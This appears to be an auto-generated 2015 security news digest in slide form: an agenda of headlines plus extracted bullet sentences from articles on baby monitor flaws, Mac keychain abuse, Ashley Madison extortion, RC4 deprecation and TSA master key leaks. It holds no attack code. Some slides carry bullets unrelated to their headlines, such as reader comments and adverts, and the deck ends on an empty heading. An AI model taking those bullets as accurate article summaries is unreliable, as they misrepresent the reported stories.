## Agenda

- BlockTrail Launches Multi-Platform Bitcoin Wallet With No Access To Your Coins

- Mind-blowing secrets of NSA's security exploit stockpile revealed at last

- Hackers spent at least a year spying on Mozilla to discover Firefox security holes  and exploit them

- ISIS hackers intercept top secret British Government emails in major security breach uncovered by GCHQ

- Cyber crims up the ante with Google Play brainteaser malware

- Linux Foundation releases PARANOID internal infosec guide

- Qualcomm's new Snapdragon 820 chipset will enable LTE-U in phones starting in 2016

- Smartphone passcodes protected by the Fifth Amendment  US court

- In brief: Android security updates, FireEye hushes infosec bod, Feds blab UK school IT vuln

- Android Stagefright Remote Code Execution

- Android 5.x Lockscreen Bypass (CVE-2015-3860) | UT Austin Information Security Office

- Googles own researchers challenge key Android security talking point

- New Android lockscreen hack gives attackers full access to locked devices

- Android 5 lock-screens can be bypassed by typing in a reeeeally long password. In 2015

- XCodeGhost iOS infection toll rises from 39 to a WHOPPING 4,000 apps

- Chinese ad firm pwns Android users, creates hijackable global botnet

- New Android ransomware locks out victims by changing lock screen PIN

- Chinese mobe market suffers pre-pwned Android pandemic

- Over 225,000 Apple Accounts Compromised Via iOS Malware

- FBI Director Claims Tor and the Dark Web Wont Let Criminals Hide From His Agents

- 'Dissent,' a New Type of Security Tool, Could Markedly Improve Online Anonymity

- US librarians defy cops, Feds  and switch on their Tor exit node

- Bitcoin is not anonymous - Elliptic

- Mapping How Tors Anonymity Network Spread Around the World

- Russian biz talks the Tor but can't walk the walk: Effort to wreck network takes bizarre turn

- Child abuse, drug sales, terrorism fears: Why cops halted a library's Tor relay ... for a month

- tor-control protocol for rapidly switching circuits / new exit node to your tor instance

- Activists leak Russian governments plans to create a national Internet

- The CIA Campaign to Steal Apple's Secrets

- People Who Need to Pee Are Better at Lying

- Kanye West thinks home 3D printing is killing the shoe industry

- Apple removes an app that tracks U.S. military drone strikes from its store

- Bonnie and Clyde bank robbers busted after posting pics of stolen cash on Facebook

- America Runs Out of IPv4 Internet Addresses

- CynoSure Prime: How we cracked millions of Ashley Madison bcrypt hashes efficiently

- Tor Weekly News  September 10th, 2015

- Tor Weekly News  September 4th, 2015

- Inspire 14: Assassination Operations and Dabiq 11: The War of Coalitions

- MIT ranks high in bad security at major universities

- Drone Self-Defense and the Law

- The remote control from HELL: Driverless cars slam on brakes for LASER POINTER

- How highly advanced hackers (ab)used satellites to stay under the radar

- Researchers respond to developers accusation that they used crypto wrong

- TSA Master Keys

- Mozilla: data stolen from hacked bug database was used to attack Firefox

- Serious bug causes quite a few HTTPS sites to reveal their private keys

- Open Source Router Firmware OpenWRT 15.05 Released

- Steal This Ham Radio (Technology)

- Finally, an Official Display for the Raspberry Pi

- See Actual Microwaves  No More Faking It

- JonDoNym/peinjector

- BackBox Linux  Penetration Testing LiveCD

- Cryptographers Brace For Quantum Revolution

- Apple Product Event Highlights

- Neocities Becomes the First Major Site To Implement the Distributed Web

- Vulnerabilities In WhatsApp Web Affect Millions of Users Globally

- Steve Wozniak "Steve Jobs Played No Role In My Designs For the Apple I & II"

- Windows Telemetry Rolls Out

- Debian Working on Reproducible Builds To Make Binaries Trustable

- Larry Lessig Reaches Funding Goal and Is Running For President

- Tiny Headless Servers Everywhere

- Orange is the New ($15) Pi

- Slimline USB Charger for tiny ham Radios

- Patch Bugzilla! Anyone can access your private bugs  including your security vulns

- Self-Destructing Computer Chip

- Obama edges toward full support for encryption  but does he understand what that means?

- Cryptome founder revokes PGP keys after weird 'compromise'

- Child Arrested Because Adults Are Stupid

- Hacking Team, Computer Vulnerabilities, and the NSA

- Learning more about the GFW's active probing system

- iOS 9 security blooper lets you BYPASS PINs, eye up photos, contacts

- Hackers upload bot code to Imgur in 8Chan attack

- Symantec employees fired for issuing rogue HTTPS certificate for Google

- Apple scrambles after 40 malicious XcodeGhost apps haunt App Store

- Improved Digital Certificate Security

- Crash Google Chrome with one tiny URL: We cram a probe in this bug

- HOWTO make a physical, papercraft GPG box

- Yet another pre-installed spyware app discovered on Lenovo computers

- Boston man hasn't showered for 12 years, prefers homebrew bacteria spray

- New test purportedly spots psychopathy in babies

- AVG Proudly Announces It Will Sell Your Browsing History To Online Advertisers

- Microsoft Has Built a Linux Distro

- Keybase's New Key Model

- Profiled: From Radio to Porn, British Spies Track Web Users Online Identities

- KARMA POLICE: GCHQ spooks spied on every web user ever  The Register

- Answers to Frequently Asked Questions about libreboot

- I created a fake business and bought it an amazing online reputation

- Keywhiz

- Password Hashing Competition

- Top 100 list shows Ashley Madison passwords are just as weak as all the rest

- Half the Fanbois in your office are unpatched ATTACK VECTORS

- 3D printer blueprints for TSA luggage-unlocking master keys leak online

- Chinese Tech Companies Hire 'Cheerleaders' To Motivate Programmers

- Attacks accessing Mac keychain without permission date back to 2011

- Tor Weekly News  August 30th, 2015

- Pwn2Own Tokyo hacking contest trashed, US export rules blamed

- Ashley Madison hack miscreants may have earned $6,400 from leak

- At LAST: RC4 gets the stake through the heart

- Ashley Madison: Our site is full of women, and members are growing

- Stingray stung: FBI told 'get a warrant'

- 9 baby monitors wide open to hacks that expose users most private moments

- Microsoft backports data slurp to Windows 7 and 8 via patches

- IoT baby monitors STILL revealing live streams of sleeping kids

- Prepare to be Thunderstruck: What if 'deuszu' ISN'T the Ashley Madison hacker?

- Boffins laugh at Play Store bonehead security with instant app checker

- Ashley Madison Source Code Shows Evidence They Created Bots To Message Men

- A tiny fedora for your manbun

- Marijuana wine the next big thing

- New FCC Rules Could Ban WiFi Router Firmware Modification

[]()

.footnote[2015-10-02 14:30:45 - Agenda]

---

## New FCC Rules Could Ban WiFi Router Firmware Modification

- This approach would be far superior to effectively banning proper security practice for the ENTIRE operating system and all utilities on the device, as the current proposal does. 1The proposed rule which requires that manufacturers disallow firmware updates (other than signed manufacturer updates, typically provided for only a very short time), makes it much more difficult to prevent incidents such as the $45 million loss at TJX and the Target breach.

- Perhaps ESPECIALLY for devices which are a few years old.Secondly, updates from the manufacturer are not a viable solution for more sensitive government and private organizations due to the response time required.

- Manufacturer full updates were not available for several days to several months, as we first discussed the best long term solution and that solution propagated downstream from the authors, to the subsystem maintainers, distribution maintainers, OEM repackagers, and finally out to customers after testing at each level.

- These vital mitigations which protected sensitive networks in the interim would be illegal and prevented by manufacturer locks under the proposed rule.

- In simple terms, the proposal makes it illegal to manufacturer equipment which can be _quickly_ protected against new threats to our cyber security. 2Another reason that the proposed rule is problematic is that the manufacturer default firmware, with all available features designed to be as easily accessible as possible, is not appropriate for any environment in which security is a concern.

[http://tech.slashdot.org/story/15/09/02/1513259/new-fcc-rules-could-ban-wifi-router-firmware-modification](http://tech.slashdot.org/story/15/09/02/1513259/new-fcc-rules-could-ban-wifi-router-firmware-modification)

.footnote[2015-09-04 03:52:43 - Unknown]

---

## Marijuana wine the next big thing

-     Though he refrained from commenting on the advisability of renewing the practice of brewing weed-wine, he did say that cannabis would be one of the less dangerous additives to make a comeback, of which there are a few other less promising entries in the wine fortification market.

- Evidence for the additives comes from folkloric traditions and the practice is apparently often employed in the making of home brews, Professor Ruck explains.

- A few weeks back I happened to meet co-founder Eviana Hartman, a well-known fashion and design writer, and really dug her enthusiasm and vision for this project.

- Take flight in fresh air or zip the mini SKEYE Pico Drone through your office in between meetingswe guarantee its more fun than a coffee-break.

- EDITORS 		Mark Frauenfelder Cory Doctorow David Pescovitz 	Xeni Jardin 	Rob Beschizza

[http://boingboing.net/2015/09/02/marijuana-wine-the-next-big-th.html](http://boingboing.net/2015/09/02/marijuana-wine-the-next-big-th.html)

.footnote[2015-09-04 03:50:35 - Unknown]

---

## A tiny fedora for your manbun

- Moment of truth: Is Microsoft Office Expert on your resume, but not totally accurate?

- This pay what you want bundle will not only help you brush up on old skills, but teach you advanced techniques that will impress your current and future boss.

- From intricate Excel formulas to Outlook organization hacks, youll not only boost [] READ THE REST

- Take flight in fresh air or zip the mini SKEYE Pico Drone through your office in between meetingswe guarantee its more fun than a coffee-break.

- EDITORS 		Mark Frauenfelder Cory Doctorow David Pescovitz 	Xeni Jardin 	Rob Beschizza

[http://boingboing.net/2015/09/03/a-tiny-fedora-for-your-manbun.html](http://boingboing.net/2015/09/03/a-tiny-fedora-for-your-manbun.html)

.footnote[2015-09-04 03:49:32 - Unknown]

---

## Ashley Madison Source Code Shows Evidence They Created Bots To Message Men

- All my close friends advised me to leave my wife, but none of them could offer me a place to crash until I could get on my own feet.

- I was in an acute emotional crisis that needed an immediate remedy, and my only choice was to find a way to suck it up and work through the pain and deal with it.

- If a woman is having an acute emotional crisis due to a bad marriage, the world opens its doors to her.

- Deal with it. So while I was sucking it up and trying to pull together enough money to establish a new household from scratch, I decided to try making my interim time less miserable by having an affair.

- The real chick who messaged me sent a bunch of free amateur porn to a blank profile with no personal info and no picture.

[http://tech.slashdot.org/story/15/09/02/032213/ashley-madison-source-code-shows-evidence-they-created-bots-to-message-men](http://tech.slashdot.org/story/15/09/02/032213/ashley-madison-source-code-shows-evidence-they-created-bots-to-message-men)

.footnote[2015-09-04 03:52:48 - Unknown]

---

## Boffins laugh at Play Store bonehead security with instant app checker

- An armada of university researchers have devised a novel method of detecting malicious applications on Android app, and by way of demonstration have dug up 127,429 shady software offerings, including some bearing exploits for a whopping 20 zero days. The scheme dubbed MassVet is the brainchild of eight researchers: Kai Chen; Peng Wang; Yeonjoon Lee; XiaoFeng Wang; Nan Zhang of Indiana University, Heqing Huang and Peng Liu of Penn State University, and Wei Zou of the Chinese Academy of Sciences.

- MassVet explained in the paper [Finding Unknown Malice in 10 Seconds: Mass Vetting for New Threats at the Google-Play Scale pdf] their system dumps old signature scanning and instead compares legitimate Android frameworks to establish those that are malicious. Authors brag that it can identify a malicious app in less than 10 seconds with low false positives, and add that current vetting mechanisms stink. Unlike existing detection mechanisms, which often utilize heavyweight program analysis techniques, our approach simply compares a submitted app with all those already on a market, focusing on the difference between those sharing a similar UI structure (indicating a possible repackaging relation), and the commonality among those seemingly unrelated.

- This analysis is made scalable by its simple, static nature and the feature projection techniques that enable a cloud-based, fast search for view/code differences and similarities.  The gathering of ivory tower minds say of the zero-day malware, three load and execute dynamic suspicious code; one takes sneaky photos; another modifies the booting sequence of other apps; seven rip sensitive user data like SIM card, serial, and telephone number, and several spew adware. The presence of these activities makes us believe that very likely they are actually zero-day malware, they say.

- The research fleet finds Google more than a quarter of the time will merely ban the player, not the payload, allowing other net scum to run the same malicious code.

- Actually, among the 2125 reappeared apps, 604 confirmed malware (28.4 percent) showed up in the Play Store unchanged, with the same MD5 and same names.

[http://www.theregister.co.uk/2015/08/31/massvet_finding_unknown_malice_in_10_seconds_mass_vetting_for_new_threats_at_the_googleplay_scale/](http://www.theregister.co.uk/2015/08/31/massvet_finding_unknown_malice_in_10_seconds_mass_vetting_for_new_threats_at_the_googleplay_scale/)

.footnote[2015-09-04 03:48:09 - Unknown]

---

## Prepare to be Thunderstruck: What if 'deuszu' ISN'T the Ashley Madison hacker?

- Security researcher Brian Krebs last week named whoever is behind the Twitter account deuszu as likely having had a hand in the Ashley Madison hack.

- And in 2015 the Ashley Madison hackers made the companys work computers play the song Thunderstruck as well. The image below shows deuszus tweet from August 4, 2012.

-  To form a counter-argument, consider the other news grabbing global attention in late July 2012? Iranian nuke plants rocked in midnight heavy metal blast  a tale of something odd going on in Iran emerged in late July of that year. Its not really too much of a stretch to think that in early August 2012, deuszu might have been listening to Thunderstruck, based on his interest in infosec news and the level of media attention mentioning the song at the time. Even deuszus later use of the tune in defacements he tweeted seems like simple imitation of what had happened in Iran. The claim that the Impact Team hackers managed to make Ashley Madison employees computers play AC/DCs Thunderstruck in 2015, and a screenshot showing deuszu once listened to the same song in 2012, is hardly forensic proof deuszu was responsible for the Ashley Madison hack. Who knew what, first? The second point that bothers me is to attribute this hack to deuszu based on a belief that Twitter provides the best  or only  timeline for the hack. Krebs assertion that Twitter account deuszu appears to be closely connected to the Ashley Madison hack appears to rest on this tweet:

-  Thadeus Zu may well have been the first to post about it on Twitter on 17 July (without linking to the dumps), but frankly, tweeting about a breaking story  already announced online for more than 48 hours  seems a pretty crummy indication of potential guilt in perpetrating the original hack. Impact Team publicly announced the hack on 15 July 2015  two whole days before deuszu first tweeted about the breach on 17 July.

- Its not hard to change time zone settings, or to misinform. One of Zus Twitter accounts follows Australian news and political accounts (as Krebs spotted), but its also worth stating that Zu is a member of a number of Facebook groups with links to Italy and Australia; and that ThadeusZu has previously posted links mentioning Brisbane, Australia. Over the past few days, Krebs article has kicked off a Twitter spat with Zu and the researchers claims were widely reported. But theres two particular details that are just as indicative of Zus identity and association as Krebs observations:  The website linked on ThadeusZus Twitter account profile points at nsa.gov; and

[http://www.theregister.co.uk/2015/09/01/prepare_to_be_thunderstruck_what_if_deuszu_isnt_the_ashley_madison_hacker/](http://www.theregister.co.uk/2015/09/01/prepare_to_be_thunderstruck_what_if_deuszu_isnt_the_ashley_madison_hacker/)

.footnote[2015-09-04 03:47:28 - Unknown]

---

## IoT baby monitors STILL revealing live streams of sleeping kids

- Isolated real-world reports of hacking of baby monitors date back at least two years, so its not as if the problem is new. Last year privacy watchdogs at the ICO warned parents to change the default passwords on webcams to stop perverts snooping on kids. The warning followed a security flap created by the site, hosted in Russia, that streamed live footage ranging from CCTV networks to built-in cameras from baby monitors.

- Thereafter, a hacker could login at will to view the stream of any camera of their choosing Ten vulnerabilities reported to affected vendors by Rapid7 were disclosed at the High Technology Crime Investigation Association (HTCIA) conference on Tuesday, 2 September.

- The other security issues raised, especially those related to exposed remote access protocols and featuring hardcoded credentials, can be risky depending on their network accessibility, Rapid7 warns. All of the tested devices run a fully-fledged operating system and therefore offer a point of attack for purposes other than abusing the baby monitors intended functionality. Rapid7 told affected manufacturers and US-CERT about the bugs it found back in early July, but many of vulnerabilities remain unpatched two months later. Vendors exhibited widely varied responses to the reported problems, as a white paper (pdf) from Rapid7 explains.  During the course of the vulnerability disclosure process, we saw vendors exhibit the entire range of possible responses.

- On the exemplary side, one vendor, Philips N.V., had an established protocol for handling incoming product vulnerabilities, which included using a documented PGP key to encrypt communications around this sensitive material.

- Weaved, a provider of an IoT-in-the-cloud framework for Philips, was especially open with and responsive to the authors of this paper.  Rapid7 has published more details of its research (and further background material) on its Internet of Things microsite.

[http://www.theregister.co.uk/2015/09/03/baby_monitors_insecure_internet_things/](http://www.theregister.co.uk/2015/09/03/baby_monitors_insecure_internet_things/)

.footnote[2015-09-04 03:45:20 - Unknown]

---

## Microsoft backports data slurp to Windows 7 and 8 via patches

- We recently mused, half seriously, whether the entire point of the Windows 10 upgrade was to harvest your personal information.

- All the updates can be removed post-installation  but all ensure the OS reports data to Microsoft even when asked not to, bypassing the hosts file and (hence) third-party privacy tools.

- This data can include how long you use apps, and which features you use the most, snapshots of memory to investigate crashes, and so on. The updates are KB3068708 (Update for customer experience and diagnostic telemetry and mandatory) KB3075249 (Update that adds telemetry points to consent.exe in Windows 8.1 and Windows 7) and KB3080149 (also an Update for customer experience and diagnostic telemetry, both optional). The notes explain that diagnostic telemetry data is sent to settings-win.data.microsoft.com (64.4.54.253) over SSL.

- Privacy advocates note that the OS is hardwired to use that hostname, so trying to override the IP address it resolves to using your PCs hosts file wont work. The tools relate to Microsofts CEIP (customer experience improvement program).

- Disabling the monitoring tools is complicated, requiring tweaks via both the policy editor, and at application level. If youre not bothered by anonymised data being sent to Microsoft (or mobile data caps) then the telemetry elevations probably wont bother you. Microsofts creepy robo-buddy contextual operating service, Cortana  which has caused much of the privacy concerns, even though its fairly well explained  remains an exclusive to Windows 10 and Windows 8.1 Phone. Ghacks has a useful guide on undoing the cheeky telemetry escalation.

[http://www.theregister.co.uk/2015/09/01/microsoft_backports_data_slurp_to_windows_78_via_patches/](http://www.theregister.co.uk/2015/09/01/microsoft_backports_data_slurp_to_windows_78_via_patches/)

.footnote[2015-09-04 03:47:09 - Unknown]

---

## 9 baby monitors wide open to hacks that expose users most private moments

- The security of Internet-connected baby monitors got a failing grade from researchers who found critical vulnerabilities in all nine of the models they reviewed. The weaknesses make it possible for hackers half a world away to perform a host of nefarious actions.

- The study reviewed the models for standard security weaknesses, such as hard-coded accounts with default passwords, unencrypted video and audio feeds, commands sent in cleartext over the Internet, and the ability to gain unauthorized control through remote shells and similar interfaces.

- If Microsoft, Apple, Google, and other companies with core competencies in software struggle so mightily to secure their wares, it only stands to reason these relative newcomers to network connectivity would have even bigger challenges.

- Most IoT devices run a version of Linux that will be woefully out of date by the time its in the homes of the people using it. The equally alarming finding out of the Rapid7 study is the response of manufactures when they received private reports of the vulnerabilities that were found.

- Some companies questioned the motives behind the research and asked why they should respond at all. People who are in the market for a baby monitor should strongly consider getting a model like this one, which offers no Internet connectivity and uses encryption to protect the video and audio stream sent between the camera and a dedicated handset.

[http://arstechnica.com/security/2015/09/9-baby-monitors-wide-open-to-hacks-that-expose-users-most-private-moments/](http://arstechnica.com/security/2015/09/9-baby-monitors-wide-open-to-hacks-that-expose-users-most-private-moments/)

.footnote[2015-09-04 03:46:17 - Unknown]

---

## Stingray stung: FBI told 'get a warrant'

- 

- The US Department of Justice has moved to quell the ongoing row over the use of IMSI-catchers like Stingray, with a new policy that requires a warrant before theyre deployed. The policy, announced here, is designed to establish a higher and more consistent legal standard and increase privacy protections for the use of cell-site simulators.

- The policy takes effect immediately and applies across all DoJ agencies. The policy also addresses the understandable fear that anyones cellphone use could be caught by the devices, merely because they happened to be in the same place at the same time as a Stingray was in use. The DoJ statement notes that the policy includes data handling requirements and an agency-level implementation of an auditing program to ensure that data is deleted consistent with this policy.

- For example, when the equipment is used to locate a known cellular device, all data must be deleted as soon as that device is located, and no less than once daily. The controversial devices have been under attack from the ACLU, and lawyers in the US are working through FBI use of Stingrays in case convictions can be appealed. The new policy has been welcomed by House Oversight and Government Reform Committee Chairman Jason Chaffetz, who released this statement on TwitLonger. As Ive long stated, establishing a high uniform standard helps protect personal privacy and discourages abuse and mishandling of these powerful devices, he wrote. He states that the battle isnt over, since theres still secrecy around the use of geolocation technology, and Chaffetz says the DoJ should continue to produce information  including the Jones memos  to help Congress and the public understand how the federal government tracks people. 

-  Sponsored:  Go beyond APM with real-time IT operations analytics 

[http://www.theregister.co.uk/2015/09/04/stingray_stung_fbi_told_get_a_warrant/](http://www.theregister.co.uk/2015/09/04/stingray_stung_fbi_told_get_a_warrant/)

.footnote[2015-09-04 03:44:39 - Unknown]

---

## Ashley Madison: Our site is full of women, and members are growing

- Embattled adultery website Ashley Madison has launched a rearguard action, claiming new sign-ups and more female members in the aftermath of Julys megahack. Self-styled King of Infidelity Noel Biderman quit as chief exec of Avid Life Media, the parent firm of Ashley Madison, on Friday.

- To recap, all hell has broken loose since hackers raided the Ashley Madison website in July, before leaking databases containing 36 million accounts plus source code and Bidermans company emails weeks later. Avid Life Media  which has pledged to continue running  faces class-action lawsuits as well as negative media coverage over suicides linked to the outing of its love-rat users. In addition, security researchers whove been through the leaked data reckon that not many women were using the biz.

- Separate analysis of leaked data also turned up evidence which suggested that paying $19 to delete accounts on the site left all sorts of personal information intact. Avid Life Media hit back at these criticisms on Monday with a combative statement, suggesting that recent media reports predicting the imminent demise of Ashley Madison are greatly exaggerated and decrying suggestions that few woman actually used the site. On the contrary, women outnumbered men, it claimed.  Despite having our business and customers attacked, we are growing.

- Last week, a reporter who claimed to analyse the stolen data made incorrect assumptions about the meaning of fields contained in the leaked data.

- They want evidence rather then a flat dismissal of criticism. If Avid Life wants to dispute the male:female ratio, explain how to interpret the data differently.

[http://www.theregister.co.uk/2015/09/01/ashley_madison_more_female_members/](http://www.theregister.co.uk/2015/09/01/ashley_madison_more_female_members/)

.footnote[2015-09-04 03:47:00 - Unknown]

---

## At LAST: RC4 gets the stake through the heart

- 

- One of the security sets most intractable problems is the stubborn endurance of old standards  the kind of thing that left SSLv3 hanging around so that people didnt have to weed out fallback code, for example. Well, at least one of securitys code zombies, the insecure and inadequate RC4 crypto algorithm, has been formally abandoned by Google, Mozilla, and Microsoft in coordinated announcements.

- The three outfits have agreed to unplug RC4s life-support early in 2016. Their decision comes a couple of months after yet-another RC4 attack was able to recover RC4-encrypted cookies within 52 hours. Mozilla says the only variable between Firefox, Chrome and Internet Explorer will be their release cycles. Mozilla that its defaults will be no-RC4 in version 44 expected in January (but users will still be able to explicitly set a preference if they need it and know what theyre doing). Disabling RC4 will mean that Firefox will no longer connect to servers that require RC4.

- The data we have indicate that while there are still a small number of such servers, Firefox users encounter them at very low rates, the Mozilla note says. Google says its going to deprecate RC4 entirely sometime in January or February 2016. Microsoft is disabling RC4 by default in Internet Explorer and Edge in a similar time-frame.

-  Sponsored:  OpenStack for enterprise: The tipping point cometh 

[http://www.theregister.co.uk/2015/09/03/at_last_rc4_gets_the_stake_through_the_heart/](http://www.theregister.co.uk/2015/09/03/at_last_rc4_gets_the_stake_through_the_heart/)

.footnote[2015-09-04 03:45:41 - Unknown]

---

## Ashley Madison hack miscreants may have earned $6,400 from leak

- Some blackmail attempts against victims of the ongoing Ashley Madison saga resulted in several  albeit modest  pay outs, according to new research. Extortionists seized on the data dump of the cheaters website database last month with demands to pay up, or risk having their friends and family told about their dalliances, as previously reported.

- An unknown group or individuals (probably unrelated to the self-styled Impact Team who pulled off the hack) sent extortion emails demanding Bitcoin for silence. Toshiro Nishimura, research analyst at spam filtering firm Cloudmark, began investigating whether any payments had actually been made by looking at signs on the Bitcoin blockchain. He first determined that a sample of Bitcoin addresses used to send extortionate demands were all freshly minted.

- This is an unsurprising discovery by itself but it did mean that some potential avenues of further inquiry were blocked off. All the scam emails consistently demanded exactly 1.05 BTC from their victims, so Nishimura searched the blockchain for transactions paying exactly that amount to infer if such extortion demands were being paid. He found 67 suspicious transactions totalling 70.35 BTC or approximately $15,814 within the extortion time frame of approximately four days.

- This is more than a statistical glitch, according to Nishimura. We can strongly reject the null hypothesis that the incidence of matching transactions during the extortion period followed a Poisson distribution at the historical rate, thus allowing us to infer that perhaps the 40 per cent of the 67 transactions totalling approximately $6,400 may be attributable to victims paying the blackmail, Nishimura concludes in a blog post. Nishimura adds a caveat that his findings are far from conclusive and, in any case, incomplete.

- Such analysis could potentially help law enforcement to de-anonymise and pursue the perpetrators, according to Nishimura. The Cloudmark security expert theorises that the whole Ashley Madison email extortion scam may be the brainchild of an opportunistic professional spammer or spammers(s). For a spammer with pre-existing infrastructure and tools, this extortion campaign could have yielded a worthwhile sum for very little effort, Nishimura argues. All the blackmailer had to do was download the Ashley Madison data, extract the email addresses, generate a Bitcoin address for each victim and send out the emails, he added.

[http://www.theregister.co.uk/2015/09/03/ashley_madison_blackmail_lucrative_scam/](http://www.theregister.co.uk/2015/09/03/ashley_madison_blackmail_lucrative_scam/)

.footnote[2015-09-04 03:44:57 - Unknown]

---

## Pwn2Own Tokyo hacking contest trashed, US export rules blamed

- The Cold War has reached out a long-dead hand to stifle the Pwn2Own hackfest in Tokyo  with the international Wassenaar Arrangement blamed for the events cancelation. Organized by the HP TippingPoint-backed Zero Day Initiative, Pwn2Own slings bounties to researchers who find and exploit security bugs in popular software and gear.

- But it seems that this year, nobody could work out whether vulnerabilities revealed in Tokyo could be brought back to the US and elsewhere without breaking the Wassenaar treaty, which is an agreement between 41 nations including the US and Japan. An HP spokesperson told The Register via email that the Zero-Day Initiative made the decision to cancel the event, writing: Due to the complexity of obtaining real-time import/export licenses in countries that participate in the Wassenaar Arrangement, the ZDI has notified conference organizer Dragos Ruiu that it will not be holding the Pwn2Own contest at PacSecWest in November. Ruiu had previously tweeted that HP pulled its sponsorship and that he intends to try and host some kind of hackfest in its place:  The first bona fide casualty of the Wassenaar changes: HP wont be doing PWN2OWN Mobile in Japan due to new export restrictions.

- Stand by for details.  dragosr (@dragosr) September 1, 2015  Like the Internet well route around export blocks, solve by handing bugs over to local reps in .jp dont need to feed bugs back to US  dragosr (@dragosr) September 1, 2015 He also told Ars that HP had lawyered up to the tune of US$1 million to test the legal risk of Pwn2Own in a post-Wassenaar world, but decided it was untenable. HP confirmed to The Register that it had worked with its lawyers on the issue, but wouldnt comment on how much it had cost. Hackers had already expressed their concern that Pwn2Own was at risk, since its open to the interpretation that trafficking flaws across borders is banned in light of the Wassenaar Arrangement. The text added last year to Wassenaar, which was originally a Cold War-era arms-control pact, forbids the export of:  Software specially designed or modified to avoid detection by monitoring tools, or to defeat protective countermeasures, of a computer or network-capable device, and performing any of the following:

- (a) The extraction of data or information, from a computer or network-capable device, or the modification of system or user data; or (b) The modification of the standard execution path of a program or process in order to allow the execution of externally provided instructions.  As The Register noted in June, that language could stretch far beyond hacks and exploits, since it could also be read to mean that antivirus cant be exported. While the US has toned down its approach to implementing the Wassenaar treaty, Ars says the problem for Pwn2Own is Japans cumbersome and vague implementation of the agreement. Its also all colossally convenient for HP, which is apparently considering ejecting its Tipping Point biz ahead of its corporate split.

-  Sponsored:  OpenStack for enterprise: The tipping point cometh 

[http://www.theregister.co.uk/2015/09/03/pwn2own_tokyo_trashed_wassenaar_blamed/](http://www.theregister.co.uk/2015/09/03/pwn2own_tokyo_trashed_wassenaar_blamed/)

.footnote[2015-09-04 03:44:44 - Unknown]

---

## Tor Weekly News  August 30th, 2015

- This means that they are typically quite hard for humans to remember, unless the hidden service operator  whether by chance or by making repeated attempts  hits upon a memorable string, as in the case of Facebooks hidden service. The problem, writes George Kadianakis, is that due to these user-unfriendly strings, many people dont verify the whole onion address, they just trust the onion link or verify the first few characters.

- After discussions with other researchers in this area, George drew up a proposal to incorporate visual information into the verification process: So when TBB connects to a hidden service, it uses the onion address to generate a randomart or key poem and makes them available for the user to examine. As with all new development proposals, however, there are many unanswered questions.

- In short, Some real UX research needs to be done here, before we decide something terrible. If you have clear and constructive feedback to offer on this unusual but important proposal, please send it to the tor-dev mailing list. Tor-enabled Debian mirrors Richard Hartmann, Peter Palfrader, and Jonathan McDowell have set up the first official onion service mirrors of the Debian operating systems software package infrastructure.

- Are you interested in making the world a better place by putting your development skills to use in a globally used free software project?

- The users of Tors QA page will be happy to know.  This issue of Tor Weekly News has been assembled by qbi, Lunar, nicoo, and Harmony. Want to continue reading TWN?

[https://blog.torproject.org/blog/tor-weekly-news-%E2%80%94-august-30th-2015](https://blog.torproject.org/blog/tor-weekly-news-%E2%80%94-august-30th-2015)

.footnote[2015-09-04 03:43:36 - Unknown]

---

## Attacks accessing Mac keychain without permission date back to 2011

- Now theres evidence the underlying weakness has been exploited for four years. As documented by Twitter user @noarfromspace, the keychain-penetrating technique was carried out in 2011 by a piece of malware known as DevilRobber.

- The then new threat caught the attention of security researchers because it commandeered a Macs graphics card and CPU to perform the mathematical calculations necessary to mine Bitcoins, something that was novel at the time.

- Less obvious was the DevilRobbers use of the AppleScript programming language to locate a window requesting permission to access the Keychain and then simulate a mouse click over the OK button. Thomas Reed, who is director of Mac offerings at security firm Malwarebytes, said he tested the AppleScript on the current version of Apples OS X and found it worked, as long as a user had already allowed the app running the script to control the Mac.

- On Monday, Reed disclosed the same technique was being used by the Genieo adware installer to gain access to a Safari extensions list thats protected inside the Mac Keychain.

- The Mac keychain is the protected place storing account passwords and cryptographic keys. I think that Apple needs to isolate that particular window, Reed told Ars on Wednesday.

[http://arstechnica.com/security/2015/09/attacks-accessing-mac-keychain-without-permission-date-back-to-2011/](http://arstechnica.com/security/2015/09/attacks-accessing-mac-keychain-without-permission-date-back-to-2011/)

.footnote[2015-09-04 03:46:00 - Unknown]

---

## Chinese Tech Companies Hire 'Cheerleaders' To Motivate Programmers

- HughPickens.com writes: Lauren O'Neil writes at CBC News that internet companies "across China" are hiring "pretty, talented girls that help create a fun work environment.

- " Dubbed "programming cheerleaders," these young women serve to chit-chat, play Ping-Pong with employees as part of their role, and sometimes smile and clap for male employees who play guitar in the office, as indicated by photos posted to the news service's verified "Trending in China" Facebook page.

- "According to the HR manager of an Internet company that hired three such cheerleaders, its programmers are mostly male and terrible at socializing," reads China.org.cn's Facebook post.

- "The presence of these girls have greatly improved their job efficiency and motivation.

- "What a ridiculous job, why reduce women to only be valued by their looks and to assist males.

[http://developers.slashdot.org/story/15/09/11/1415243/chinese-tech-companies-hire-cheerleaders-to-motivate-programmers](http://developers.slashdot.org/story/15/09/11/1415243/chinese-tech-companies-hire-cheerleaders-to-motivate-programmers)

.footnote[2015-09-12 11:50:02 - Unknown]

---

## 3D printer blueprints for TSA luggage-unlocking master keys leak online

- A number of amateur 3D printers have printed the skeleton keys using the blueprints, and posted photos of their successful attempts at opening Travel Sentry locks on social media. Reports point to the source of the files as being a high-resolution picture from a Washington Post story about the US Transportation Security Administration (TSA) that was published last year  an image that has since been taken down, but is readily available online.

- A quick search also turns up more high-quality images of the seven master keys. The locks are officially approved by the TSA and come with a small red triangle to identify them.

- pic.twitter.com/8PNlB06TRu  Deviant Ollam  (@deviantollam) September 10, 2015 The masterkeys are kept hidden away by the TSA, but the thousands of copies made for security staff to use have inevitably led to pictures finding their way to the internet; the Washington Post story being the most public outing. It is also likely that professional thieves have had copies of the masterkeys for some time, since it is possible to reverse engineer them by buying a range of locks and using the keys that come with them to figure out what the masterkey pattern is. Due to the keys simplicity though, it is possible to create copies from just a picture.

- The previous small-scale efforts have now been blown up thanks to the ready availability of 3D files and 3D printing machines, putting access to all 300 million locks into the public realm.

- Manufacturers are likely to be wary of the costs of doing so when the next set of master keys could also be leaked at any time. Suffice to say, the age-old advice of staying close to your bags continues to be the best defense against theft.

[http://www.theregister.co.uk/2015/09/10/tsa_master_key_blueprints_leaked/](http://www.theregister.co.uk/2015/09/10/tsa_master_key_blueprints_leaked/)

.footnote[2015-09-12 11:40:46 - Unknown]

---

## Half the Fanbois in your office are unpatched ATTACK VECTORS

